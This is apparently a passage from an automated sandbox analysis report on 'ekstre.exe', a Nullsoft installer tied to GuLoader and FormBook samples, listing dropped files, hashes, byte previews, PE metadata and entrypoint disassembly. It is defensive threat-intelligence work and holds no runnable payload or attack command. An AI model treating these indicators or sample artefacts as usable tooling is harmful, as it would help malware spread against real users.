	QUOTATIO.EXE.exe	Get hash	malicious	GuLoader	Browse
	Transport_Plan.exe	Get hash	malicious	FormBook, GuLoader	Browse
	TRANSPOR.EXE.exe	Get hash	malicious	GuLoader	Browse
	QUOTATIO.EXE.exe	Get hash	malicious	GuLoader	Browse
	Transport_Plan.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Primnesses\Sofabordets\Adreamed\Afhndelses\sukkerrters\Airways_17.bmp

Download File

Process:	C:\Users\user\Desktop\ekstre.exe
File Type:	PNG image data, 110 x 110, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	6367
Entropy (8bit):	7.956699024614257
Encrypted:	false
SSDEEP:	192:+t8u3sD8fSYrz6XL++wzu8F5JBQwmNLnu:C8IsQaGILyu8DJB71
MD5:	A9CC1DF0C2FC00B478CAFF538EEF0DB3
SHA1:	E261F813FC606B5B426CFFC6BA74424EA3F656C6
SHA-256:	1C382B5092FFD0992B819754BB87474FD7F02157B19ECEA3B4C089539B8F0DB7
SHA-512:	AF7DFFEDE63340F10F32B067F87793326CB8E073CE3FF709F717AA8C67CDC8A6FACD13372E559553C958D14C9D0AD9282932F5C879D5687BB4B7957783247016
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR...n...n.....I9......pHYs...a...a..?.i....IDATx...o..y..R.)...z.m} .%%qb.@..oM..D...oJ.$R..YJZ..e'.+..u.,.:xH.EI............=Hn.....r.]...(........~..>.13.#.J6%.....R..m)...Bi[J..-.P.R(mK)....J.R..m)...Bi[J..-.P.R(mK)..%..#...(....pnK`k....%..ipk....V.4...M......l..M..D..B.....'\|..7.s'..<...eV.0v.O...S...Ue.,L...0.Y.t...v.;J..;....\......LE..<.?.S..p.Z.EQ.6.....?mi. .......jQ.>.. ..>.R..C>.....uE...<.......,.FD.A...N....=@I.................J.{#Yj....;.(....{.1....y.{..}..s..$..=..=...j.d.k...qD..,....g.x...Qy...2..#.j3~....a9.A...yx.Q\hg...JR....U._Uo....E....(m.z.G...1...^.7.m....~.....3.P..t.Q ..d4.:.T....PY.Rv."C..........{....\|.+..v......w.t.P~.5...i...'c[.>U.7..3..k...S.a.gD....;2.u..%.\.u.".w-...Q>.V.d.k.Gy@..Z.D@.C.....8....+......}..w.%e...j..E.3.j..SWOH(..X......=.&2R.Q.....rQ.VE......O...b^...-....#.)WR..m..6.`...a.r..a...+n.3$4.j..i.......E8.#,..V0.........&.CjS.y.G.x.\O?.z.Y...7......g2..h.....".7

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Primnesses\Sofabordets\Adreamed\Afhndelses\sukkerrters\Apache License 2.0.txt

Download File

Process:	C:\Users\user\Desktop\ekstre.exe
File Type:	ASCII text, with very long lines (946), with CRLF line terminators
Category:	dropped
Size (bytes):	9231
Entropy (8bit):	4.5874594842190115
Encrypted:	false
SSDEEP:	192:GzfWP1VooUTo1xF/FFNRFE6Gz3jGb2y1CVDh2ioHqx9JbzLwg:ketUk1xtFZ83UEXb959
MD5:	10775F285F4D94C4C4C965A8B3685134
SHA1:	0C9D4A28E8EA4F9A5269616099E46A472E8452D4
SHA-256:	E872B4A399A9CD078BABF679143A42D6277BC1EE152B6E286EA95B4CEE8E227F
SHA-512:	DA8116AE935C72C7A6AF9C92284D0CFC7464B249CFED17A1C634ED4EBAC89E76C9C882B7E8C2A7E870A94723363E6E47D8327B57AF0DE34478FA942A72B74B8B
Malicious:	false
Preview:	Apache License 2.0 (Apache)..Apache License..Version 2.0, January 2004..http://www.apache.org/licenses/....TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION....1. Definitions....."License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document....."Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License....."Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity....."You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Primnesses\Sofabordets\Adreamed\Afhndelses\sukkerrters\Opisthoporeia.mus

Download File

Process:	C:\Users\user\Desktop\ekstre.exe
File Type:	data
Category:	dropped
Size (bytes):	171204
Entropy (8bit):	4.604031272869013
Encrypted:	false
SSDEEP:	3072:w9R4wchcQX4yKpAz7Vtr1w3FYHlMHJrrgkF0NnF:whcqQXepAzBtO3FYHlMHJfTFYF
MD5:	AEFCC391D0DE21BF957FAB8E3D18E4C0
SHA1:	C225CF6DA433B2792335C66925BF7EEA64D5F21B
SHA-256:	507452A12959AC17B9715A61B06C326951511CB6456BFF0C0F6AD34985D53746
SHA-512:	317B0EFBC1FBD013C601718D18CB6762F2643ACB7825CF486626BE4E97E9D351001C9F2E31283CC81C7E97DBD83CB3F2113BAC2B34D26809B0E36517A23F8875
Malicious:	false
Preview:	.........................................j.....................f.....aa.............II....qq..........................N.......CCC...................pp..............................CCCCCC.........#...MMMM...................\..CCCCCCCC.........j...."""...........................................oo....zz.....................xx..........HHH.www.__.N.+.....K.cccc.o........KK.KKKKK.............................jj.+...................;........................rr...........-..66...................]]].........a...WW........<...__.............LLL...........III.....$$.............LL.................................v.IIII................=.r..................Y.......&.dd._..........T..........D.!............i..p.....Z.........FF.RR.............................nn............V..........8................B...;;.. ........../..ee.....11....PP.`.....C....6..........\|...........B...\\.OO........................DD.................???................sssss.zz.........jj....>>>>.>.........................III.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Primnesses\Sofabordets\Adreamed\Afhndelses\sukkerrters\api-ms-win-core-console-l1-2-0.dll

Download File

Process:	C:\Users\user\Desktop\ekstre.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12256
Entropy (8bit):	6.644909464047625
Encrypted:	false
SSDEEP:	192:wGWthWhPWf9BvVVWQ4eWovtkqnajOyr391jV:HWthWhCNKlqyrd
MD5:	57193BFBCCEFE3D5DF8C1A0D27C4E8D4
SHA1:	747F1D3841A9175826439D37E2387A4CF920641C
SHA-256:	F5025E74DE2C1C6EA74E475B57771AC32205E6F1FA6A0390298BBE1F4049AC5D
SHA-512:	68AD2750E0282FB3AE8D40AC7E22DDA43B2073342BB160C20D81D61C69B08A6E766756B432C71CC65E99CDAFB70152D53563F0B02708FFF84DC3E9F376D51C99
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Ziraat_Bankasi_Swift_Mesaji.exe, Detection: malicious, Browse Filename: RFQ_(Baku_State_University)_2303EU_-_0328AZ#U00b7p.exe, Detection: malicious, Browse Filename: RFQ_(Baku_State_University)_2303EU_-_0328AZ#U00b7p.exe, Detection: malicious, Browse Filename: BO353672UH.exe, Detection: malicious, Browse Filename: BO353672UH.exe, Detection: malicious, Browse Filename: H._H._Arnold_Co._RFQ_230327#U00b7pdf.exe, Detection: malicious, Browse Filename: Solicitud_de_Cotizaci#U00f3n_(Instituto_Polit#U00e9cnic.exe, Detection: malicious, Browse Filename: H._H._Arnold_Co._RFQ_230327#U00b7pdf.exe, Detection: malicious, Browse Filename: Solicitud_de_Cotizaci#U00f3n_(Instituto_Polit#U00e9cnic.exe, Detection: malicious, Browse Filename: E-dekont.exe, Detection: malicious, Browse Filename: E-dekont.exe, Detection: malicious, Browse Filename: INVENT_LIST.exe, Detection: malicious, Browse Filename: INVENT_LIST.exe, Detection: malicious, Browse Filename: TRANSPOR.EXE.exe, Detection: malicious, Browse Filename: QUOTATIO.EXE.exe, Detection: malicious, Browse Filename: Transport_Plan.exe, Detection: malicious, Browse Filename: TRANSPOR.EXE.exe, Detection: malicious, Browse Filename: QUOTATIO.EXE.exe, Detection: malicious, Browse Filename: Transport_Plan.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............be..be..be...e..be...a..be......be...g..be.Rich.be.................PE..d.....r..........." .........................................................0............`A........................................p................ ...................!..............p............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Primnesses\Sofabordets\Adreamed\Buntmagersyers\Mamelonation\preferences-desktop-locale-symbolic.symbolic.png

Download File

Process:	C:\Users\user\Desktop\ekstre.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	152
Entropy (8bit):	6.029986423847036
Encrypted:	false
SSDEEP:	3:yionv//thPl9vt3lAnsrtxBllfsvlNyJM6nSAF+qTWUKbp:6v/lhPysFsyJMM1/WUKbp
MD5:	3A061B1D8E0C06669F229495C5F752B5
SHA1:	F4EFACECA569F364C0E2F61B51306DE1C28A5F9D
SHA-256:	00DFB2A43D14EAD479185B9B81DA4B393928BC4168E747A3B039AAD946CAEFCC
SHA-512:	6E6777428CD410ED463925ED8F10A365191CEEDEB8363B6F234AA0F4B329C04E9A386195DF9A4EE7FE383A9AFA56ACE08FF36B1CFBEF0701FF4C3E5F9E0024A7
Malicious:	false
Preview:	.PNG........IHDR................a....sBIT....\|.d....OIDAT8...... .D.c.g..}.mrS....Y.......3..uVPk..E0B.e...O...6+.."....G..7......%..`.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Primnesses\Sofabordets\Adreamed\Buntmagersyers\Mamelonation\preferences-system-search.png

Download File

Process:	C:\Users\user\Desktop\ekstre.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	614
Entropy (8bit):	7.5711750251575785
Encrypted:	false
SSDEEP:	12:6v/7vkb/nfA8UWSBwvcz/lnSon2luRTihGM1pRxbaQFec:WG3A83See3phobjRxbVcc
MD5:	65AA386F54F6DE02B0624ED10EB4F9EB
SHA1:	AA6185AE0807902503046B9611EB3EFB72A1B543
SHA-256:	9477BCD6CDCE97584E48868D244910425128B985DB2B1C7ABBB9DEAF9234E50B
SHA-512:	DFE7BE8BD74B36E461ADB93FEEF322D2F0BA2BBB7E6AE321E846F7E226A1FCB84EF77DD0DA0B534467A1016D5E8998E6D62CFC4A7F65AB2AA2B9AF5759EDB9E6
Malicious:	false
Preview:	.PNG........IHDR................a...-IDATx.....A.....m.;.\.8....py....o.......?.....Q^..-%^.}..Bm.-{5..".9.-.\?[...........g..x...p$L.o^....=..{.!....m....15?.`$.;.X...;V.@...F.uD.....Y.x.J.l}..U.v{P...p..x....((WU.v.#%.3T..n...%%...N00>.......L..4.:q...\..c'`j....l...h..Jy...r..]......X.l.x<&M.KK...X.....b.......O..A.......\|.t..9%...3e..........H......eK.>"BI..xjk.O..l...o)LOO!....v.....t....}.^...a..]X.......D.Q.=.....{..0=.U.6BUU0hkk%...]]....l...............F.............BSs.1.d......S...U...x"A#cc.c..\.;w.R......Z.4...?...s....q........,&cr......>..$.S.g\|..J...].@.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Primnesses\Sofabordets\Adreamed\Buntmagersyers\Mamelonation\printer-printing-symbolic.svg

Download File

Process:	C:\Users\user\Desktop\ekstre.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	295
Entropy (8bit):	4.922153835627764
Encrypted:	false
SSDEEP:	6:tI9mc4slzcWER4W6UmUuksJtjdU0tytlN8uFWOXM2KchvXa7BGl0/:t4CDqW6zUmjW0ktl+sd1a7BM0/
MD5:	611C311204F39AB0E7F3CC8A0264246A
SHA1:	9E4A3BEA0DE6D11491E5AA69A61E1FF051D79DED
SHA-256:	1E6C4120B833698852CF451D0B5F8FCA83CD5591EA73EBC3C918547B67FBEB34
SHA-512:	919628653C7441CC4F82C7177D5A6EBBB86686A4E15435A21201B1D77B325808435323FA9FF906E6DB4D612ACEB1C00AC89B0571181D1F521636943EFE25EEF0
Malicious:	false
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><path d="M2 4c-.5 0-1 .5-1 1v4c0 .5.5 1 1 1h1V8h10v2h1c.5 0 1-.5 1-1V5c0-.5-.5-1-1-1zm2-3v2h8V1z" fill="#2e3436"/><path class="success" d="M4 9v5h8V9zm2.99.998l2.03.011-.01 1 2.003-.01L8.03 13 5 11l2.002.011z" fill="#33d17a"/></svg>

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Primnesses\Sofabordets\Adreamed\Buntmagersyers\Mamelonation\security-low-symbolic.svg

Download File

Process:	C:\Users\user\Desktop\ekstre.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	841
Entropy (8bit):	5.120954413046558
Encrypted:	false
SSDEEP:	12:t4CDq+ekfBmWPQ6DCiSWBXQsiCydrkeYRAerAFFLAmP5rGDT2K509A0/:t4CQ0BFPCizvyKbRAecFxVrGDT/al/
MD5:	A90DC3F74A2FF2503F6887F697E1D401
SHA1:	1EDC9EFDE8F12B0BA80075F9DD10B68099D7DACF
SHA-256:	379AF678C30BDCF7E4EBA28A20F1A867AE1376A78F1AFA9C76BC28299594260A
SHA-512:	7D4A61B001F454C2DAA8945169755C825FE74B373FEAEFE323B5BBF83446727ED737F350DD75AC87A6FCD41A9AF0307E09B0BB6B898F6660ED901A83627D4A7B
Malicious:	false
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><path d="M2 1v7c0 2.072 1.498 3.695 2.832 4.889a18.66 18.66 0 002.66 1.972l.516.305.512-.31s1.32-.8 2.65-2.002C12.5 11.65 14 10.044 14 8V1zm2 2h8v5c0 .92-1 2.313-2.17 3.37-.913.825-1.477 1.154-1.836 1.386-.358-.226-.918-.543-1.828-1.358C5 10.355 4 8.98 4 8z" style="line-height:normal;font-variant-ligatures:normal;font-variant-position:normal;font-variant-caps:normal;font-variant-numeric:normal;font-variant-alternates:normal;font-feature-settings:normal;text-indent:0;text-align:start;text-decoration-line:none;text-decoration-style:solid;text-decoration-color:#000;text-transform:none;text-orientation:mixed;shape-padding:0;isolation:auto;mix-blend-mode:normal;marker:none" color="#bebebe" font-weight="400" font-family="sans-serif" overflow="visible" fill="#474747"/></svg>

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Primnesses\Sofabordets\Adreamed\Disneyland\emblem-system-symbolic.svg

Download File

Process:	C:\Users\user\Desktop\ekstre.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	2009
Entropy (8bit):	4.109676211458903
Encrypted:	false
SSDEEP:	48:cfn1WwI9THonnR4+5ySMxTVjemPboAS9UYQ0Ab:0IRHOep3xxC5S2Ab
MD5:	CA03328D67E6CDBD551EC567F0360A7C
SHA1:	26DC0E85CFB26558BF61B92912076A6DA235DCCC
SHA-256:	3D032EB0E326643BECEB49F35F73AD6D9B97BC829F310514E352B444FEEB8589
SHA-512:	6F02ACC657347DBC4B0D77D455A9F82DBBEA20028398983BCEBAA6CE964F70EB8106FFA1181B886EDCAC3A0CA882F9CCDFCCE997BFE9FD7096D398395D2E18D9
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<svg height="16px" viewBox="0 0 16 16" width="16px" xmlns="http://www.w3.org/2000/svg">. <path d="m 8 0 c -0.253906 0 -0.503906 0.0117188 -0.75 0.0351562 l -0.464844 2.3945318 c -0.382812 0.082031 -0.757812 0.199218 -1.105468 0.355468 l -1.75 -1.675781 c -0.445313 0.261719 -0.832032 0.585937 -1.214844 0.925781 l 1.035156 2.179688 c -0.253906 0.285156 -0.484375 0.597656 -0.675781 0.929687 l -2.394531 -0.324219 c -0.203126 0.46875 -0.351563 0.957032 -0.464844 1.464844 l 2.109375 1.140625 c -0.019531 0.195313 -0.039063 0.378907 -0.039063 0.574219 s 0.019532 0.378906 0.039063 0.570312 l -2.109375 1.144532 c 0.113281 0.507812 0.261718 0.996094 0.464844 1.460937 l 2.394531 -0.320312 c 0.191406 0.332031 0.421875 0.644531 0.675781 0.929687 l -1.035156 2.175782 c 0.382812 0.34375 0.769531 0.667968 1.214844 0.933593 l 1.75 -1.683593 c 0.347656 0.15625 0.722656 0.277343 1.105468 0.359374 l 0.464844 2.390626 c 0.246094 0.023437 0.496094 0.039062 0.75 0.039

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Primnesses\Sofabordets\Adreamed\Homeopathy224\Katodestraaler\Forkful.Spr

Download File

Process:	C:\Users\user\Desktop\ekstre.exe
File Type:	data
Category:	dropped
Size (bytes):	287262
Entropy (8bit):	7.010373700418485
Encrypted:	false
SSDEEP:	6144:G/NvAbHdIJNxyiPlMQJIJFTnKELRkkIN2Ql:G/NYbHdeNJI/TnK0CNL
MD5:	D5330AE411A17A890DB41E19DF1E26F9
SHA1:	DBA61901407ED68891BAC56E6E6DEF47C09295B3
SHA-256:	A52D651F8E3E2ECD9A9407BE4C35A01218679B1D9A28BAB211B5597D5508257C
SHA-512:	7518DF099A05F468848CF9852F3986695A7D3A4F87593D907894FF95ADD8E82FF8CE1B553BBFF3FAFEBE4BC7023B49E070BD8A30E7A69ED88E8434DC33619571
Malicious:	false
Preview:	rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Primnesses\Sofabordets\Adreamed\Hoses\Unfurcate\Auditrerne\Stumpless\folder-new-symbolic.symbolic.png

Download File

Process:	C:\Users\user\Desktop\ekstre.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	200
Entropy (8bit):	6.353867134664978
Encrypted:	false
SSDEEP:	6:6v/lhPys1AhcwQnKFxLsaV0MSFw6YB1L5jp:6v/7RgFKBE1L5N
MD5:	B1E1142D7EF33AD94E80A7394C036540
SHA1:	D05408C3B4360DE12D0B7A1CCB04A27E946FD517
SHA-256:	9572648AC9CA12A253EFBFB3DB0160C56CBFAAC3157779285642FAEB1D86CA94
SHA-512:	18AC511A1916E99780BAB5D3CEDBCA816932D88A4230F8FFADE5C17DBF1511840033D5A05322B0AA3EE4D30A9105D2F211C84C46DDFAAA71008444669CB65A3F
Malicious:	false
Preview:	.PNG........IHDR................a....sBIT....\|.d.....IDAT8..Q.. .D_...F....t..>d!jS....pa.....F`....t9......D.`.{`M.7`H..2' >.xS.9W.\|..@[...;T5..Q.... .Y.q.._-..F#F...n..W..8.L'A...!.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Primnesses\Sofabordets\Adreamed\Intuitions\Fljtes\bluetooth-disabled-symbolic.symbolic.png

Download File

Process:	C:\Users\user\Desktop\ekstre.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	231
Entropy (8bit):	6.659057882897354
Encrypted:	false
SSDEEP:	6:6v/lhPysFO7H1+cxWGBdaXhd1zHuplZIN0JE7TZYp:6v/7gz0cxWxX/RHyg7Vy
MD5:	DD0F7D44CD5F3D799E056054C1F90AA8
SHA1:	562BC0AE77C33221C3DA8E17AB6C872B73415968
SHA-256:	32B57ACDD26404246D35BB926EA2CE4445B4D4972EE56B282D69F7243381C26C
SHA-512:	72F4E2DB5CB219BC0A527A7C78127D2A3CBBD2C04BCF6CB1DDE5394DCE68AF2F5F186847C0D0397DB15A9E6BF3B7F11F9BD760E873048FF6D83AEF08ACDB899E
Malicious:	false
Preview:	.PNG........IHDR................a....sBIT....\|.d.....IDAT8.....0...?C..a..2uf"UR0....)@...Y'^Ca...$`M..20..p.K.]~......CzA...4b._...(b@.d..E.....PCB..x...7.7W..L@Cy....!D.7......*....4E..t.o.vJ......j.s...-XQ#<.\e....IEND.B`.

C:\Users\user\AppData\Local\Temp\nsc76F4.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\ekstre.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	5.9764977667479
Encrypted:	false
SSDEEP:	192:CVA1YOTDExj7EFrYCT4E8y3hoSdtTgwF43E7QbGPXI9uIc6w79Mw:CrR7SrtTv53tdtTgwF4SQbGPX36wJMw
MD5:	D968CB2B98B83C03A9F02DD9B8DF97DC
SHA1:	D784C9B7A92DCE58A5038BEB62A48FF509E166A0
SHA-256:	A4EC98011EF99E595912718C1A1BF1AA67BFC2192575729D42F559D01F67B95C
SHA-512:	2EE41DC68F329A1519A8073ECE7D746C9F3BF45D8EF3B915DEB376AF37E26074134AF5F83C8AF0FE0AB227F0D1ACCA9F37E5CA7AE37C46C3BCC0331FE5E2B97E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7@t.s!..s!..s!..!T..t!..8Y..t!..s!..g!...T..w!...T..r!...T..r!...T..r!..Richs!..........................PE..L....c.........."!.....$..........J........@...............................p............@..........................@.......A..P............................`.......................................................@..X............................text...{".......$.................. ..`.rdata.......@.......(..............@..@.data...D....P.......,..............@....reloc.......`......................@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsg7405.tmp

Download File

Process:	C:\Users\user\Desktop\ekstre.exe
File Type:	data
Category:	dropped
Size (bytes):	718250
Entropy (8bit):	5.083661662793563
Encrypted:	false
SSDEEP:	6144:xy/9/NvAbHdIJNxyiPlMQJIJFTnKELRkkIN2QKFhcqQXepAzBtO3FYHlMHJfTFYf:+/NYbHdeNJI/TnK0CNeqByAzB8Omwl
MD5:	F4ECA6314F398FC69A2967FA8FF3ABA9
SHA1:	27D5A802C97873F4DDF360D0040CC09209C31E5A
SHA-256:	767F9D74D332E39863B43972E5C4044937B1FCC76E65AACF1B3DC0A86B061A59
SHA-512:	8D277DC5F4B7BDAD897FA0A0344249BA82DE70EC26D67EF080675F041D979374B8B6750D5A23B9AAB2298DB58CC9F0F7C98752A262FB678E5A66C380928EF6EF
Malicious:	false
Preview:	.H......,.......................P!.......G.......H..........................................................{.z.............................4...............................................................................................................................................G...a...........&...j...............................................................................................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\DORME.ini

Download File

Process:	C:\Users\user\Desktop\ekstre.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	31
Entropy (8bit):	4.244518891032036
Encrypted:	false
SSDEEP:	3:UkE74OvrMXMAzovn:izMxEvn
MD5:	3000F7F0F12B7139EA28160C52098E25
SHA1:	9D032395F38D341881019B996E591160D542054B
SHA-256:	467B09FF26622746D205628AE325EC9838461BC5FE741B3757BB39DDEC87ECB1
SHA-512:	A76A2F1E3686E2FFD03388EC7DBCD4AFA6AE53CCD3AA40C6FBBF0C994EEE5E2685D0C412F15EC4506C1175F5A84712E1A8B7AE32E6A0327E1BA47321A59E0EE2
Malicious:	false
Preview:	[ManualPaths]..NumEntries=Hai..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.9401954488153415
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	ekstre.exe
File size:	330402
MD5:	9382db91f2e5799a51da843a33e3e2fa
SHA1:	d790d2370fb485d5f659bb2d859239d662e61d97
SHA256:	9a24f59f2af8bc6f278f8ad8d8e9664687deef8ac0a387ea576a9d1e84837fc7
SHA512:	ad3a143bfa6256d63ba1f4a0bf1bc9ad9a1091759431de3272da1f72def622d9eda1bf9bb138b8438c7015046be5faa506fa3949d999169d75dff7b5da1818c6
SSDEEP:	6144:hT5UzmFsm1KpmjQb1xD/cNbnchml4qh25ehklF8gQpZGIEZyxguj/3Xh:hT55FFUb1xTcNbzl4qhWmklFEoZMgubh
TLSH:	6E6413046790D1B7DDF327B34E729E99AEFA4A320020964B33906F7D77964419E0F786
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h.......@.

File Icon


Icon Hash:	b2a88c96b2ca6a72

Static PE Info

General

Entrypoint:	0x403640
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x614F9D02 [Sat Sep 25 22:04:50 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	61259b55b8912888e90f516ca08dc514

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 000003F4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [ebp-14h], ebx
mov dword ptr [ebp-04h], 0040A230h
mov dword ptr [ebp-10h], ebx
call dword ptr [004080C8h]
mov esi, dword ptr [004080CCh]
lea eax, dword ptr [ebp-00000140h]
push eax
mov dword ptr [ebp-0000012Ch], ebx
mov dword ptr [ebp-2Ch], ebx
mov dword ptr [ebp-28h], ebx
mov dword ptr [ebp-00000140h], 0000011Ch
call esi
test eax, eax
jne 00007F437CB5E33Ah
lea eax, dword ptr [ebp-00000140h]
mov dword ptr [ebp-00000140h], 00000114h
push eax
call esi
mov ax, word ptr [ebp-0000012Ch]
mov ecx, dword ptr [ebp-00000112h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [ebp-26h], 00000004h
not eax
and eax, ecx
mov word ptr [ebp-2Ch], ax
cmp dword ptr [ebp-0000013Ch], 0Ah
jnc 00007F437CB5E30Ah
and word ptr [ebp-00000132h], 0000h
mov eax, dword ptr [ebp-00000134h]
movzx ecx, byte ptr [ebp-00000138h]
mov dword ptr [00470318h], eax
xor eax, eax
mov ah, byte ptr [ebp-0000013Ch]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [ebp-2Ch]
movzx ecx, cx
shl eax, 10h
or eax, ecx

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8504	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x271000	0xb58	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
